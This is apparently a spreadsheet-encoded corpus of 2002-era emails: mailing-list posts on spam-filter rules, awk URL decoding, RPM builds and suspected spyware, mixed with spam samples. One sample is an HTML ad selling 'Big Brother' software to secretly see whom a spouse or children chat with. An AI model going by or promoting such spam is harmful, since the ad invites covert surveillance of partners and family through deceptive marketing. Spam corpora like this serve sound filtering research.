 that I can think of with no luck at all.
 -- 
                                         Reg.Clemens
                                         reg@dwf.com
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] Re: several messages
</t>
  </si>
  <si>
    <t xml:space="preserve">Political news T R U T H O U T uses it too.
 Justin Mason wrote:
 &gt;&gt;&gt;&gt;  0.978    0.540    1.184    0.31   -1.00  FWD_MSG
 &gt;&gt;&gt;
 &gt;&gt;&gt;I'm a bit surprised that any spams hit this one.  Did somebody forward a 
 &gt;&gt;&gt;spam that then went into a corpus?
 &gt;&gt;
 &gt;&gt;My corpus is quite clean and I get spam hits.
 &gt; 
 &gt; 
 &gt; yes, it's being frequently forged already.
 &gt; 
 &gt; 
 &gt;&gt;&gt;&gt;  1.582    2.226    1.279    0.64    0.39  GAPPY_TEXT
 &gt;&gt;&gt;
 &gt;&gt;&gt;Gappy text in a non-spam?  It must be a  H E A D L I N E  or something.  
 &gt;&gt;&gt;Maybe just remove space from the list of "gap" characters?
 &gt;&gt;
 &gt;&gt;For 2.50, we could try to figure out which nonspams are hitting and
 &gt;&gt;improve the rule.
 &gt; 
 &gt; 
 &gt; BTW I subscribe to the Media Unspun newsletter, and it and a few others
 &gt; regularly use that H E A D L I N E thing.
 &gt; 
 &gt; splitting it into 2, one that matches gappy text with punctuation chars,
 &gt; one that matches spaces between the chars, would probably help.  if
 &gt; anyone's bothered, I'd suggest filing a bug.
 &gt; 
 &gt; --j.
 &gt; 
 &gt; 
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by: OSDN - Tired of that same old
 &gt; cell phone?  Get a new here for FREE!
 &gt; https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 &gt; _______________________________________________
 &gt; Spamassassin-devel mailing list
 &gt; Spamassassin-devel@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/spamassassin-devel
 &gt;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</si>
  <si>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[IIU] spyware calling home?
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello all
 I'm looking for advice. My pc has developed a disturbing tendency of trying
 to access IP 62.17.143.253 without my consent. It has got to the stage where
 normal web-browsing is almost impossible.
 I have checked IP address on RIPE database and I know precisely who is being
 called. I contacted that company on 14 July, when the problem first arose
 and asked for a remedy but (surprise) got no reply.
 A helpful person on the ie.comp list suggested Adaware spyware removal. I
 ran this and haven't had a problem again until today.
 The offending program is obviously not in Adaware db. (I run adaware with
 current ref files every day now).
 Any suggestions, please,  for removing whatever the f*** is causing this
 from my pc?
 Brian
 _______________________________________________
 IIU mailing list
 IIU@iiu.taint.org
 http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-08-10
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 TPF Announces Newsletter Mailing List, Translations
     posted by KM on Friday August 09, @13:03 (links)
     http://use.perl.org/article.pl?sid=02/08/09/174257
 search.cpan.org Out of Beta
     posted by KM on Friday August 09, @16:46 (cpan)
     http://use.perl.org/article.pl?sid=02/08/09/2046256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</si>
  <si>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On Tue, 27 Aug 2002, David Neary wrote:
 &gt; &gt; Actually the following would be in some way sensible:
 &gt; &gt; echo -e "`echo "$enc" | sed 's/%\([0-9a-fA-F]\{2,2\}\)/\\\x\1/g'`"
 &gt; 
 &gt; Why {2,2}? Why not {2}?
 no idea.
 the above was something along the lines i was attempting, once i 
 realised it was a straight swap. but i couldnt get awk's gensub to 
 insert the \x for %'s and ='s.
 anyway, in the end i found something on the internet and adapted it:
 function decode_url (str,    hextab,i,c,c1,c2,len,code) {
         # hex to dec lookup table
         hextab ["0"] = 0;       hextab ["8"] = 8;
         hextab ["1"] = 1;       hextab ["9"] = 9;
         hextab ["2"] = 2;       hextab ["A"] = 10;
         hextab ["3"] = 3;       hextab ["B"] = 11;
         hextab ["4"] = 4;       hextab ["C"] = 12;
         hextab ["5"] = 5;       hextab ["D"] = 13;
         hextab ["6"] = 6;       hextab ["E"] = 14;
         hextab ["7"] = 7;       hextab ["F"] = 15;
         decoded = "";
         i   = 1;
         len = length (str);
         while ( i &lt;= len ) {
                 c = substr (str, i, 1);
                 # check for usual start of URI hex encoding chars
                 if ( c == "%" || c == "=" ) {
                         if ( i+2 &lt;= len ) {
                                 # valid hex encoding?
                                 c1 = toupper(substr(str, i+1, 1));
                                 c2 = toupper(substr(str, i+2, 1));
                                 if ( !(hextab [c1] == "" &amp;&amp; hextab [c2] == "") ) {
                                         code = 0 + hextab [c1] * 16 + hextab [c2] + 0
                                         c = sprintf ("%c", code)
                                         i = i + 2
                                 }
                         }
                 # + is space apparently
                 } else if ( c == "+" ) {
                         c = " "
                 }
                 decoded = decoded c;
                 ++i;
         }
         return decoded
 }
 &gt; Cheers,
 &gt; Dave.
 &gt; PS the late reply is because the footer on the original mail (If
 &gt; you received this mail in error yadda yadda) got caught in my
 &gt; spam filter, and ended up in my junkmail directory.
 he he...
 might not have been the footer - check my headers. :)
 regards,
 -- 
 Paul Jakma	paul@clubi.ie	paul@jakma.org	Key ID: 64A2FF6A
 	warning: do not ever send email to spam@dishone.st
 Fortune:
 One nuclear bomb can ruin your whole day.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: use new apt to do null to RH8 upgrade?
</t>
  </si>
  <si>
    <t xml:space="preserve">Is it possible to use new apt to do (null) to RH8 upgrade?
 Even if it's possible, are there good reasons why maybe I should not do it and
 just use the RH iso's (I don't think RH8 will upgrade from (null), maybe up2date
 will)?
 --
 That's "angle" as in geometry.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: And Away We go
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Off we go to the hospital
 Benjamin Wallace Higgins is on his way.
 -tom
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Make you look and feel 20 YEARS YOUNGER!18861
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-07-22 at 06:20, che wrote:
 &gt; The server mentioned above works again now :)!
 Any problems with the rpm's they provided?
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 08 Oct 2002 13:05:53 -0700
 Ben Liblit &lt;liblit@eecs.berkeley.edu&gt; wrote:
 &gt; &gt; RPM build errors:
 &gt; &gt;     File not found by glob:
 &gt; &gt; /var/tmp/freetype-2.1.2-root/usr/lib/libttf.so.*
 &gt; &gt;     File not found: /var/tmp/freetype-2.1.2-root/usr/lib/libttf.so
 &gt; 
 &gt; Weird.  I had no problems at all rebuilding from the SRPM with specfile
 &gt; modified to enable the bytecode interpreter.  The "check-files" test
 &gt; warns that "/usr/share/aclocal/freetype2.m4" was not included in any
 &gt; package, but other then that, it's all perfectly clean.
 Hi, Ben,
 it seems, the RH freetype package should be repacked,
 see for this
 https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=74415
 Please, can you atach and send your sucessfully rebuild of the RH freetype
 rpm with the bytecode enabled to me?
 -- 
   Regards from Germany
                      Matthias
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Want to see the web sites they went to?
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;BODY bgcolor=3D"#FFFFFF"&gt;
 &lt;table width=3D"389" align=3D"center" cellspacing=3D"0" cellpadding=3D"0" =
 border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"389" height=3D"10" bgcolor=3D"3C3F7E"&gt;&lt;font size=3D"1"&gt; 
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td align=3D"center"&gt;&lt;br&gt;
 &lt;font face=3D"Tahoma, Arial, Helvetica, sans-serif" color=3D"CC334E" size=3D=
 "4"&gt;
 &lt;b&gt;FIND OUT WHO THEY ARE CHATTING/EMAILING WITH&lt;br&gt;FOR ALL THOSE HOURS!&lt;/b=
 &gt;
 &lt;br&gt;&lt;br&gt;&lt;font size=3D"2" color=3D"3C3F7E"&gt;&lt;b&gt;
 Is your spouse cheating online?  Are your kids talking to dangerous people
  on instant messenger?&lt;BR&gt;&lt;BR&gt;&lt;font color=3D"CC334E"&gt;FIND OUT NOW&lt;/font&gt; w=
 ith
  Big Brother&lt;br&gt;available as an instant software download.&lt;BR&gt;&lt;BR&gt;
 &lt;FONT SIZE=3D"3"&gt;ONLY $39.95&lt;/FONT&gt;&lt;br&gt;&lt;br&gt; &lt;font size=3D"5"&gt;
 &lt;a href=3D"http://p047.xxlhost.de/bigbro/index.asp?Afft=3DM18"&gt;
 &lt;font color=3D"CC334E"&gt;Click Here To Order&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;br&gt;&lt;br=
 &gt;&lt;/b&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height=3D"10" bgcolor=3D"3C3F7E"&gt;
 &lt;font size=3D"1"&gt; &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td align=3D"center"&gt;&lt;br&gt;
 &lt;font size=3D"1" color=3D"777783" face=3D"Tahoma, Arial"&gt;Please click 
 &lt;a href=3D"http://p047.xxlhost.de/remdata/remove.asp"&gt;&lt;font color=3D"77778=
 3"&gt;
 here&lt;/font&gt;&lt;/a&gt; if you would like to be removed from this list.&lt;/font&gt;
 &lt;br&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/body&gt;&lt;/html&gt;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</si>
  <si>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[Razor-users] Fire.cloudmark.com is having issues
</t>
  </si>
  <si>
    <t xml:space="preserve">I noticed a drop in checks, and did some tests.  If I move truth up in
 my catalog list, a check comes back postive, but if I move fire up in
 the list, then I don't get the positive check back.  It's almost like
 it's not syncing up with Hubris which is the one my reports are getting
 sent to.
 -=Bobby
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Mailing addresses against spam? Re: Al'Qaeda's fantasy ideology: Policy Review no. 114
</t>
  </si>
  <si>
    <t xml:space="preserve">John Hall signs his message:
 &gt; John Hall
 &gt; 13464 95th Ave NE
 &gt; Kirkland WA 98034
 Is this some new "I'm not spam" signal, to include a 
 valid mailing address?
 - Gordon
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [zzzzteana] Free Web Hosting?
</t>
  </si>
  <si>
    <t xml:space="preserve">Bill:
 &gt; I've decided that I ought to put some of my writing samples on-line for
 &gt; potential employers to mock. And I don't want to pay for it. There are still
 &gt; a couple dozen places to do this, do any of you have preferences?
 &gt;
 Getting your own domain needn't be expensive, looks more professional, and
 you're not going to suddenly lose your site with little or no notice (yes,
 I'm still smarting from bastard Geocities). I registered mine through
 http://www.easyspace.com/ - works out about a pound a week for registration
 and 30Mb hosting. It's a valuable service, there's no reason not to expect
 to pay.
 TimC
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Looking for a more powerful website? Try GeoCities for $8.95 per month.
 Register your domain name (http://your-name.com). More storage! No ads!
 http://geocities.yahoo.com/ps/info
 http://us.click.yahoo.com/aHOo4D/KJoEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] test
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tuesday 27 August 2002 19:26 CET Leroy B. wrote:
 &gt; Ignore...
 Can't.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</si>
  <si>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public mailing list sign up package
</t>
  </si>
  <si>
    <t xml:space="preserve">Has anyone seen/heard of/used some package that would let a random person 
 go to a webpage, create a mailing list, then administer that list.  Also 
 of course let ppl sign up for the lists and manage their subscriptions. 
 Similar to the old listbot.org, but i'd like to have it running on my 
 server not someone elses :)
 Chris
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 26 Aug 2002, Geege wrote:
 &gt; Latest Rambus memory plus fast bus appear to give Intel's newest P4 the jolt it needs.
 Well, Athlon FSB 333 is almost there. And I'm really looking forward to 
 the Hammer series.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Next MS Office? Here's what I'd add--and delete [ANCHORDESK]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</si>
  <si>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=3D28-A2wXIRd4OHvEluZEL2t1VlTK8yiR" &gt;&lt;img src=3D"http://www.zdnet.com/graph=
 ics/newsletters/hd_anchor.gif" width=3D"440" height=3D"60" border=3D"0"  al=
 t=3D"AnchorDesk Daily"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D160 align=3Dcenter valign=3Dtop rowspan=3D2 bgcolor=3D"#ffffff"=
 &gt;
         &lt;img src=3D"http://www.zdnet.com/techupdate/i/gl_ad2.gif" width=3D"=
 160" height=3D"16" border=3D"0"  alt=3D"Advertisement"&gt;&lt;br&gt;
         &lt;!--tower --&gt;
       &lt;iframe src=3D"http://www.zdnet.com/include/ads/ifc/RGROUP=3D2766" sc=
 rolling=3D"no" frameborder=3D"0" hspace=3D"0" vspace=3D"0" height=3D"600" w=
 idth=3D"160" marginheight=3D"0" marginwidth=3D"0"&gt;
 &lt;script language=3D"JavaScript" src=3D"http://www.zdnet.com/include/ads/js/=
 RGROUP=3D2766"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;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href=3D"http://clickthru.online.com/Click?q=3D2c-DatOIc0=
 D7TOa1DHc-r7MBvWpjuyR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Veritas CEO Gary Bloom speaks out at Tech Update.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;img s=
 rc=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=3D"6"&gt;&lt;br=
 &gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D41-qqJ1IEK=
 ImbN-LLfU5CfCkxHB0FFR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Check out these personal laser printer picks at ZDNet Reviews.&lt;/b&gt;&lt;/font&gt;&lt;/=
 a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" hei=
 ght=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D56-NwKYInn=
 s9SfaBZErctPQDwwaMC9R" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 See how WAP works and how you should use it at Builder.com.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;=
 br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=
 =3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D6b-8g5ZIHE=
 cwpy9OqK80ywQ-4d0P6cR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Need a new job? Find one today in ZDNet's Career Center.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt;=
  &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=3D=
 "6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D80-KTKvQQ0=
 KirA2TVIoaDkjVsTLZ8iR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 CIOs talk out about the future of IT at CNET News.com.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;=
 img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=3D"6=
 "&gt;&lt;br&gt;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&gt;THU JUL 11,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ck?q=3D96-pjdWQtduMsjnk1njZWSoS2P4Jm4R" &gt;&lt;b&gt;Next MS Office? Here's what I'd=
  add--and delete&lt;/A&gt;&lt;/B&gt;&lt;/font&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphic=
 s/clear.gif" width=3D"1" height=3D"4"&gt;&lt;br&gt;
                 The next version of Microsoft Office is due in the next yea=
 r or so. If you were product manager for the industry-standard office suite=
 , what would you add? What would you get rid of? What would you fix? Here's=
  my wish-list Top Ten.&lt;p&gt;
         =20
        =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dab-ZcQKQYp=
 dYiCIewPXydit0M-0OvrR" &gt;&lt;b&gt;NOTE: Why we're changing our publishing schedule=
 &lt;/b&gt; &lt;/a&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage=
 /b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
        =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dc0-kfs-QWP=
 2ztPrXYT41H99K8FZuSiR" &gt;&lt;b&gt;PLUS: AnchorDesk Radio: The changing geography o=
 f the Net&lt;/b&gt; &lt;/a&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/=
 frontpage/b.gif"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href=3D"http://clickthru.online.com/Click?q=3Dd5-p-viQzL1as56bE2=
 HCu4jNix1DPPR" &gt;Feds focus on cybersecurity... Passport rival... Larger iMa=
 c LCD &lt;/a&gt;&lt;p&gt;
         =20
        =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3Dea-fjLyQhV4N6GaQNz=
 AwQ4lAUw-5WnR" &gt;Want to stop spam? Here's how YOU do it &lt;/a&gt;&lt;p&gt;
         =20
        =20
                =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3Dff-sVoVQms4eirO6Cn=
 ZxrhBm0WHtheR" &gt;Tablet PCs: Very cool, but not for the masses&lt;/a&gt;&lt;p&gt;
                =20
                =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D14-5MRAIF-zaHkjyud=
 8ZvQIzTKtR1yR" &gt;Keep your PC's clock up to the second! Here's how&lt;/a&gt;&lt;p&gt;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cellspacing=
 =3D"0" border=3D"0" bgcolor=3D"#ffffff"&gt; &lt;tr bgcolor=3D"#999999"&gt;&lt;td colspa=
 n=3D"7" height=3D"15"&gt;&lt;font face=3D"ms sans serif, geneva" color=3D"#ffffff=
 " size=3D"-2"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpag=
 e/b.gif" height=3D1 width=3D3&gt;&lt;b&gt;Crucial Clicks: More from ZDNet&lt;/b&gt;&lt;/font&gt;=
 &lt;/td&gt;&lt;/tr&gt; &lt;tr&gt; &lt;td bgcolor=3D"#999999" rowspan=3D"3"&gt;&lt;img src=3D"http://ww=
 w.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D1 width=3D1&gt;&lt;/td&gt;=
  &lt;td rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fro=
 ntpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt; &lt;td colspan=3D"3"&gt;&lt;img src=3D"http=
 ://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D5 width=3D1&gt;=
 &lt;/td&gt; &lt;td rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordes=
 k/frontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt; &lt;td bgcolor=3D"#999999" rowsp=
 an=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.g=
 if" height=3D1 width=3D1&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr valign=3D"top"&gt; &lt;td width=3D"100%"=
 &gt;   &lt;table width=3D"100%"  cellpadding=3D"0" cellspacing=3D"0" border=3D"0"=
 &gt;        &lt;tr&gt;&lt;td colspan=3D"3"&gt;&lt;font face=3D"verdana, geneva" color=3D"#333=
 333" size=3D"-2"&gt;&lt;b&gt;Laptops&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.co=
 m/graphics/anchordesk/frontpage/b.gif" height=3D3 width=3D1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr=
 &gt;     &lt;tr valign=3D"top"&gt;       &lt;td width=3D"85"&gt;&lt;a href=3D"http://clickthr=
 u.online.com/Click?q=3D29-Sg_rIjMAHELne5dNyGEI9rCM8vlR" &gt;&lt;img src=3D"http:/=
 /www.zdnet.com/products/graphics/042502_p4_laptop.jpg" width=3D"85" height=
 =3D"110" border=3D"0" alt=3D"" /&gt;&lt;/a&gt;&lt;/td&gt;       &lt;td width=3D"5"&gt;&lt;img src=
 =3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D1 wi=
 dth=3D5&gt;&lt;/td&gt;        &lt;td width=3D"100%"&gt;&lt;font face=3D"arial, helvetica" siz=
 e=3D"-1"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D3f-4sAEIqMW45fOpy=
 SHcoh57BymNzeR" style=3D"text-decoration:none"&gt;&lt;b&gt; 2GHz to Go&lt;/b&gt;&lt;/a&gt; &lt;br /=
 &gt;Intel's got two new 2GHz chips for portables. But if you have to ask how m=
 uch the jump from 1.8GHz to 2GHz will cost you, you probably can't afford i=
 t. &lt;/font&gt;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;&lt;td colspan=3D"3"&gt;&lt;img src=3D"http://www.zdne=
 t.com/graphics/anchordesk/frontpage/b.gif" height=3D3 width=3D1&gt;&lt;br /&gt;&lt;img =
 src=3D"http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width=3D"8"=
  height=3D"10" border=3D"0" alt=3D"" /&gt;&lt;font face=3D"arial, helvetica" size=
 =3D"-1"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D54-l6ovIZKARE6L4-Z=
 0O9U4lR0vdksR" style=3D"text-decoration:none"&gt;Read reviews&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;=
 /tr&gt;        &lt;/table&gt; &lt;/td&gt; &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/an=
 chordesk/frontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt; &lt;td width=3D"180"&gt;  &lt;t=
 able cellpadding=3D"0" cellspacing=3D"0" width=3D"180" border=3D"0" bgcolor=
 =3D"#eeeeee"&gt;        &lt;tr bgcolor=3D"#999999"&gt;&lt;td colspan=3D"3" height=3D"15=
 "&gt;&lt;font face=3D"ms sans serif, geneva" color=3D"#ffffff" size=3D"-2"&gt;&lt;img s=
 rc=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D1 =
 width=3D3&gt;Most Popular Products&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;      &lt;tr&gt;    &lt;td&gt;&lt;img src=
 =3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"10" =
 height=3D"1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;         &lt;td&gt;&lt;font face=3D"ms san=
 s serif, geneva" size=3D"-2"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anch=
 ordesk/frontpage/b.gif" width=3D"1" height=3D"5" alt=3D"" border=3D"0" /&gt;&lt;b=
 r /&gt;    &lt;b&gt;Laptops&lt;/b&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/ancho=
 rdesk/frontpage/b.gif" width=3D"1" height=3D"7" alt=3D"" border=3D"0" /&gt;&lt;br=
  /&gt;         &lt;b&gt;1&lt;/b&gt;. &lt;a href=3D"http://clickthru.online.com/Click?q=3D69-C=
 Y-iIoWgGqlV_WuMoAH4OpRzLxFR" style=3D"text-decoration:none"&gt;Gateway 600XL&lt;/=
 a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gi=
 f" width=3D"1" height=3D"3" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;        &lt;b&gt;2&lt;/b&gt;.=
  &lt;a href=3D"http://clickthru.online.com/Click?q=3D7e-XDXeInptAgOiFQti6pURwM=
 popr9R" style=3D"text-decoration:none"&gt;Dell Inspiron 2600 series&lt;/a&gt;&lt;br /&gt;&lt;=
 img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=
 =3D"1" height=3D"6" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;    &lt;b&gt;3&lt;/b&gt;. &lt;a href=3D"=
 http://clickthru.online.com/Click?q=3D93-V4PmQSdQT6bS03GcTYjvQ8Rgn5rR" styl=
 e=3D"text-decoration:none"&gt;Dell Inspiron 8200 series&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"h=
 ttp://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=
 =3D"3" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;   &lt;b&gt;4&lt;/b&gt;. &lt;a href=3D"http://clickth=
 ru.online.com/Click?q=3Da8-02XZQQZk8ceXLNTDtZs6swzdONiR" style=3D"text-deco=
 ration:none"&gt;Toshiba Satellite 2400-S251&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zd=
 net.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=
 =3D"" border=3D"0" /&gt;&lt;br /&gt;         &lt;b&gt;5&lt;/b&gt;. &lt;a href=3D"http://clickthru.o=
 nline.com/Click?q=3Dbd-c0nUQ7pyt1bYJtDpAEVgnfqGsJPR" style=3D"text-decorati=
 on:none"&gt;Dell SmartStep 100N&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/grap=
 hics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D"" border=
 =3D"0" /&gt;&lt;br /&gt;  &lt;img src=3D"http://techupdate.zdnet.com/techupdate/i/arrow=
 _blue.gif" width=3D"8" height=3D"10" border=3D"0" alt=3D"" /&gt;&lt;b&gt;&lt;a href=3D"=
 http://clickthru.online.com/Click?q=3Dd2-THo_QULwlGAjAPt3Gl22vbAOyenR" &gt;Mor=
 e popular laptops&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;  &lt;img src=3D"http://www.zdnet.com/graphics/=
 anchordesk/frontpage/b.gif" width=3D"1" height=3D"10" alt=3D"" border=3D"0"=
  /&gt;&lt;br /&gt;    &lt;/font&gt;&lt;/td&gt;    &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/=
 anchordesk/frontpage/b.gif" width=3D"10" height=3D"1" alt=3D"" border=3D"0"=
  /&gt;&lt;/td&gt;         &lt;/tr&gt;   &lt;/table&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr valign=3D"top"&gt;&lt;td colspa=
 n=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gi=
 f" height=3D5 width=3D1&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt;&lt;td colspan=3D"7" bgcolor=3D"#999999=
 "&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" hei=
 ght=3D1 width=3D1&gt;&lt;/td&gt;&lt;/tr&gt; &lt;/table&gt; &lt;!-- /### --&gt; &lt;table cellpadding=3D10=
  border=3D0 cellspacing=3D0&gt;
 &lt;tr&gt;&lt;td&gt;=20
        =20
                 =20
                =20
                        =20
                                     &lt;a href=3D"http://clickthru.online.com/=
 Click?q=3De7-2y-GQmVXfHvnRGUVqS8CMB0qvseR"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://clickthru.online.com/Click?q=3Dfd-BXDMQgOrleynyrQO_Iti64Q9t8PR" &gt;&lt;b&gt;Feds=
  focus on cybersecurity... Passport rival... Larger iMac LCD&lt;/b&gt;&lt;/a&gt;&lt;br&gt;Was=
 hington's finally realizing that cybersecurity is a key part of homeland de=
 fense. Plus: Sun's Liberty Alliance releases specs for a Microsoft Passport=
  rival. And expect an iMac with a 17-inch display at Macworld. &lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;&lt;/table&gt;
          &lt;!--------AD-----------------------------------&gt;
        =20
 &lt;!--------/AD-----------------------------------&gt;
 &lt;br&gt;
        =20
                 =20
                =20
                        =20
                                     &lt;a href=3D"http://clickthru.online.com/=
 Click?q=3D12-jaAKIl-XieZXcbr-pEvKY-qkCKnR" &gt;&lt;img src=3D"http://www.zdnet.co=
 m/graphics/anchordesk/frontpage/header2_your.gif" width=3D"150" height=3D"2=
 0" border=3D"0" vspace=3D10 alt=3D"News Analysis"&gt;&lt;/a&gt;&lt;br&gt; &lt;table cellpaddi=
 ng=3D0 cellspacing=3D0 border=3D0&gt;
                 &lt;tr&gt;
                 &lt;td bgcolor=3D"#E4F2FF"&gt;&lt;font face=3D"Arial, Helvetica" siz=
